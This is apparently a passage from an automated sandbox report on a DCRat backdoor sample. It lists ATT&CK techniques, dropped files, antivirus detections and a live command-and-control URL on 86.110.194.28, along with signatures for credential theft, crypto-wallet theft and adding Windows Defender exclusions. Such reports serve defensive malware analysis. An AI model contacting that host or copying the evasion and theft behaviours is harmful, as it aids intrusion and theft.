                          Disable or Modify Tools                          		LSASS Memory2
                          Process Discovery                          		Remote Desktop Protocol2
                          Data from Local System                          		1
                          Non-Application Layer Protocol                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)261
                          Virtualization/Sandbox Evasion                          		Security Account Manager261
                          Virtualization/Sandbox Evasion                          		SMB/Windows Admin Shares1
                          Clipboard Data                          		11
                          Application Layer Protocol                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                          Process Injection                          		NTDS1
                          Application Window Discovery                          		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          Deobfuscate/Decode Files or Information                          		LSA Secrets1
                          Remote System Discovery                          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                          Obfuscated Files or Information                          		Cached Domain Credentials1
                          System Network Configuration Discovery                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                          Software Packing                          		DCSync2
                          File and Directory Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                          DLL Side-Loading                          		Proc Filesystem145
                          System Information Discovery                          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1583651 Sample: zZ1Y43bxxV.exe Startdate: 03/01/2025 Architecture: WINDOWS Score: 100 64 Suricata IDS alerts for network traffic 2->64 66 Found malware configuration 2->66 68 Antivirus detection for URL or domain 2->68 70 14 other signatures 2->70 7 zZ1Y43bxxV.exe 4 45 2->7         started        11 svchost.exe 2->11         started        process3 dnsIp4 44 C:\Users\user\Desktop\xuLckdTj.log, PE32 7->44 dropped 46 C:\Users\user\Desktop\wGHUzQXl.log, PE32 7->46 dropped 48 C:\Users\user\Desktop\vYOmNlRn.log, PE32 7->48 dropped 50 32 other malicious files 7->50 dropped 72 Found many strings related to Crypto-Wallets (likely being stolen) 7->72 74 Drops PE files to the user root directory 7->74 76 Adds a directory exclusion to Windows Defender 7->76 78 Drops executable to a common third party application directory 7->78 14 cmd.exe 7->14         started        17 powershell.exe 23 7->17         started        19 powershell.exe 23 7->19         started        21 3 other processes 7->21 62 127.0.0.1 unknown unknown 11->62 file5 signatures6 process7 signatures8 84 Uses ping.exe to sleep 14->84 86 Uses ping.exe to check the status of other devices and networks 14->86 23 wnWNWNYIxJtFiUSDRXunzX.exe 14->23         started        28 conhost.exe 14->28         started        42 2 other processes 14->42 88 Found many strings related to Crypto-Wallets (likely being stolen) 17->88 90 Loading BitLocker PowerShell Module 17->90 30 conhost.exe 17->30         started        32 conhost.exe 19->32         started        34 WmiPrvSE.exe 19->34         started        36 conhost.exe 21->36         started        38 conhost.exe 21->38         started        40 conhost.exe 21->40         started        process9 dnsIp10 60 86.110.194.28, 49732, 49735, 49737 RACKTECHRU Russian Federation 23->60 52 C:\Users\user\Desktop\zeucltSv.log, PE32 23->52 dropped 54 C:\Users\user\Desktop\ymdvPcsA.log, PE32 23->54 dropped 56 C:\Users\user\Desktop\voDmexRC.log, PE32 23->56 dropped 58 21 other malicious files 23->58 dropped 80 Found many strings related to Crypto-Wallets (likely being stolen) 23->80 82 Tries to harvest and steal browser information (history, passwords, etc) 23->82 file11 signatures12

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          zZ1Y43bxxV.exe61%VirustotalBrowse
                          zZ1Y43bxxV.exe78%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                          zZ1Y43bxxV.exe100%AviraHEUR/AGEN.1309961
                          zZ1Y43bxxV.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\Public\UserOOBEBroker.exe100%AviraHEUR/AGEN.1309961
                          C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe100%AviraHEUR/AGEN.1309961
                          C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe100%AviraHEUR/AGEN.1309961
                          C:\Users\user\Desktop\GmBsEsrN.log100%AviraTR/Agent.jbwuj
                          C:\Program Files (x86)\Mozilla Maintenance Service\logs\StartMenuExperienceHost.exe100%AviraHEUR/AGEN.1309961
                          C:\Users\user\AppData\Local\Temp\QgDfm1tal9.bat100%AviraBAT/Delbat.C
                          C:\Users\user\Desktop\CqMurJJc.log100%AviraTR/AVI.Agent.updqb
                          C:\Users\user\Desktop\ASylWHNt.log100%AviraTR/AVI.Agent.updqb
                          C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe100%AviraHEUR/AGEN.1309961
                          C:\Users\Public\UserOOBEBroker.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe100%Joe Sandbox ML
                          C:\Users\user\Desktop\FpakjsdS.log100%Joe Sandbox ML
                          C:\Program Files (x86)\Mozilla Maintenance Service\logs\StartMenuExperienceHost.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe78%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                          C:\Program Files (x86)\Mozilla Maintenance Service\logs\StartMenuExperienceHost.exe78%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                          C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe78%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                          C:\Program Files\Internet Explorer\wnWNWNYIxJtFiUSDRXunzX.exe78%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                          C:\Users\Public\UserOOBEBroker.exe78%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                          C:\Users\user\Desktop\ASylWHNt.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Users\user\Desktop\BtlmWJui.log21%ReversingLabs
                          C:\Users\user\Desktop\CidbNaiX.log3%ReversingLabs
                          C:\Users\user\Desktop\CqMurJJc.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Users\user\Desktop\CzktcvcZ.log25%ReversingLabs
                          C:\Users\user\Desktop\EBWcxehU.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\EfGUsIxp.log25%ReversingLabs
                          C:\Users\user\Desktop\FpakjsdS.log9%ReversingLabs
                          C:\Users\user\Desktop\GmBsEsrN.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\HQmkzWIi.log29%ReversingLabsWin32.Trojan.Generic
                          C:\Users\user\Desktop\IaGAqGnL.log17%ReversingLabs
                          C:\Users\user\Desktop\JKpAqWmX.log17%ReversingLabs
                          C:\Users\user\Desktop\LGcbGTIb.log12%ReversingLabs
                          C:\Users\user\Desktop\NAfrxSmR.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\NkpshHmC.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\QMyIEiey.log25%ReversingLabs
                          C:\Users\user\Desktop\QVVIoUxv.log8%ReversingLabs
                          C:\Users\user\Desktop\RrWiEPnK.log8%ReversingLabs
                          C:\Users\user\Desktop\TxdZLwor.log12%ReversingLabs
                          C:\Users\user\Desktop\UhMZMMnD.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\VDeRaRWG.log29%ReversingLabs
                          C:\Users\user\Desktop\XriZMeSE.log9%ReversingLabs
                          C:\Users\user\Desktop\YXDPTJnw.log9%ReversingLabs
                          C:\Users\user\Desktop\YoKhhehz.log8%ReversingLabs
                          C:\Users\user\Desktop\aEoYYxCd.log21%ReversingLabs
                          C:\Users\user\Desktop\bfAYobhs.log21%ReversingLabs
                          C:\Users\user\Desktop\cNtGaFop.log16%ReversingLabs
                          C:\Users\user\Desktop\eYPHaYTq.log25%ReversingLabs
                          C:\Users\user\Desktop\fijXRHyU.log29%ReversingLabsWin32.Trojan.Generic
                          C:\Users\user\Desktop\frGXBuRR.log8%ReversingLabs
                          C:\Users\user\Desktop\iGWfDlte.log25%ReversingLabs
                          C:\Users\user\Desktop\iOGyhUTj.log21%ReversingLabs
                          C:\Users\user\Desktop\jUEFnHBb.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                          C:\Users\user\Desktop\jeYWdqhF.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                          C:\Users\user\Desktop\kdkoYnoN.log8%ReversingLabs
                          C:\Users\user\Desktop\lJFefRJG.log16%ReversingLabs
                          C:\Users\user\Desktop\mpuXdJMF.log17%ReversingLabs
                          C:\Users\user\Desktop\nUbffkpH.log25%ReversingLabs
                          C:\Users\user\Desktop\oyzEfRxS.log17%ReversingLabs
                          C:\Users\user\Desktop\rLFDskhr.log5%ReversingLabs
                          C:\Users\user\Desktop\rpqvmOyM.log8%ReversingLabs
                          C:\Users\user\Desktop\urceIxCH.log5%ReversingLabs
                          C:\Users\user\Desktop\vYOmNlRn.log29%ReversingLabs
                          C:\Users\user\Desktop\voDmexRC.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\wGHUzQXl.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\xuLckdTj.log9%ReversingLabs
                          C:\Users\user\Desktop\ymdvPcsA.log3%ReversingLabs
                          C:\Users\user\Desktop\zeucltSv.log50%ReversingLabsByteCode-MSIL.Trojan.Generic

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          http://crl.mic4%0%Avira URL Cloudsafe
                          http://86.110.194.280%Avira URL Cloudsafe
                          http://86.110.H0%Avira URL Cloudsafe
                          http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php100%Avira URL Cloudmalware
                          http://crl.micJ0%Avira URL Cloudsafe
                          http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWind0%Avira URL Cloudsafe
                          http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/0%Avira URL Cloudsafe
                          http://86.110.Hjj0%Avira URL Cloudsafe
                          http://crl.mic80%Avira URL Cloudsafe

                          Domains and IPs

                          Contacted Domains

                          No contacted domains info

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.phptrue
                          • Avira URL Cloud: malware
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtabwnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A01000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001440F000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014295000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014301000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A78000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001394D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000012FE5000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014337000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143A3000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001436D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014228000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143D9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013710000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000142CB000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001314E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000141F2000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001425E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013099000.00000004.00000800.00020000.00000000.sdmp, LTk6PkdZlU.16.dr, SD5LLGHZu2.16.dr, fvRXkhz3Kc.16.drfalse
                            		high
                            https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFwyPcM5nqV0.16.drfalse
                              		high
                              http://www.fontbureau.com/designersGwnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://duckduckgo.com/ac/?q=wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A01000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001440F000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014295000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014301000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A78000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001394D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000012FE5000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014337000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143A3000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001436D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014228000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143D9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013710000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000142CB000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001314E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000141F2000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001425E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013099000.00000004.00000800.00020000.00000000.sdmp, LTk6PkdZlU.16.dr, SD5LLGHZu2.16.dr, fvRXkhz3Kc.16.drfalse
                                  		high
                                  http://www.fontbureau.com/designers/?wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.founder.com.cn/cn/bThewnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.fontbureau.com/designers?wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 00000001.00000002.2653821923.000001BDA3F90000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://contoso.com/Licensepowershell.exe, 00000004.00000002.2433222897.0000023050483000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2518697847.0000022B3589F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.tiro.comwnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://crl.mic4%powershell.exe, 00000006.00000002.2593591623.0000027760C06000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A01000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001440F000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014295000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014301000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A78000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001394D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000012FE5000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014337000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143A3000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001436D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014228000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143D9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013710000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000142CB000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001314E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000141F2000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001425E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013099000.00000004.00000800.00020000.00000000.sdmp, LTk6PkdZlU.16.dr, SD5LLGHZu2.16.dr, fvRXkhz3Kc.16.drfalse
                                                		high
                                                http://www.fontbureau.com/designerswnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013B50000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000135A3000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001355D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013C22000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000133FF000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013B96000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000136BB000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013701000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013AC4000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013C68000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013192000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000133B9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000135E9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013675000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001362F000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001348B000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013CAE000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000134D1000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013445000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001332D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013373000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.goodfont.co.krwnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://86.110.194.28wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.00000000033A9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002CE1000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.sajatypeworks.comwnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.typography.netDwnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.founder.com.cn/cn/cThewnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002CE1000.00000004.00000800.00020000.00000000.sdmptrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.galapagosdesign.com/staff/dennis.htmwnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://crl.microsopowershell.exe, 00000006.00000002.2581210774.0000027760BE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallwnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001334E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013696000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000134F2000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001357E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013394000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013308000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013C43000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A9F000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013B2B000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013BB7000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000135C4000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000134AC000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013C89000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001360A000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013538000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013BFD000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013466000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013420000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001316D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013AE5000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000136DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
